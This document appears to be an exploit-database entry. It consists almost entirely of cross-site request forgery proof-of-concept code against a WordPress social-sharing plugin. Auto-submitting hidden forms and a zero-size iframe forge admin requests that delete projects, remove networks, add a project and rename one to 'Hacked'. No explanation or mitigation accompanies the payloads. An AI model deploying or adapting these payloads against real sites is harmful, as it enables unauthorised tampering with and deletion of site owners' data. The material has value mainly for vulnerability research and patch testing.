Share
## https://sploitus.com/exploit?id=WPEX-ID:52EFF451-8CE3-4AC4-B530-3196AA82DB48
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="route[module]" value="projects">
<input type="text" name="route[action]" value="removeNetwork">
<input type="text" name="network_id" value="1">
<input type="text" name="project_id" value="4">
<input type="text" name="action" value="social-sharing">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="route[module]" value="projects">
<input type="text" name="route[action]" value="add">
<input type="text" name="title" value="test">
<input type="text" name="design" value="flat">
<input type="text" name="networks[0]" value="1">
<input type="text" name="action" value="social-sharing">
</form>
<script>
document.getElementById("test").submit();
</script>
<form id="test" action="https://example.com/wp-admin/admin.php?page=supsystic-social-sharing&module=projects&action=delete&id=2" method="POST">
</form>
<script>
document.getElementById("test").submit();
</script>
<iframe src="https://example.com/wp-admin/admin.php?page=supsystic-social-sharing&module=projects&action=delete&id=3" width="0" height="0" frameborder="0"></iframe>
<form id="test" action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="text" name="route[module]" value="projects">
<input type="text" name="route[action]" value="rename">
<input type="text" name="title" value="Hacked">
<input type="text" name="id" value="4">
<input type="text" name="action" value="social-sharing">
</form>
<script>
document.getElementById("test").submit();
</script>